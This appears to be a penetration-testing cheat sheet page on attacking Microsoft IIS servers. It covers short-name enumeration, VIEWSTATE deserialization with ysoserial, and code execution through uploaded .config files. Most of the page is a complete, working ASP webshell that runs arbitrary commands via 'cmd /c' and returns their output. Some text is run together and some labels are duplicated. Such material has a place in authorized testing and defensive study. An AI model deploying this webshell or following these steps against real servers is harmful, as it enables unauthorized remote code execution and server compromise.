IIS Servers
Short Name Enumeration
IIS servers support short names for served files with the ~ character. For example, the page complete-transfer.aspx may not be in your wordlist, but you can retrieve the short name complet~.aspx using a script, like this one. This is useful for finding hidden web pages and other content.
python iis_shortname_scan.py http://10.10.10.10/VIEWSTATE Deserialization
The VIEWSTATE parameter is used by IIS applications to dynamically update front-end pages with server information. The parameter is serialized with the application's machine code and has integrity confirmed with a MAC. If you are able to leak the machine code from web.config, you should be able to serialize a command-execution payload through the VIEWSTATE parameter using ysoserial.
RCE via .config Files
In addition to asp and aspx files for webshells, you may be able to upload .config files. These are able to execute code just the same and aren't typically blacklisted. The below ASP webshell will work just fine (stolen from here).
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
Dim objShell, objCmdExec
Set objShell = CreateObject("WScript.Shell")
Set objCmdExec = objshell.exec(thecommand)
getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>
<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>Last updated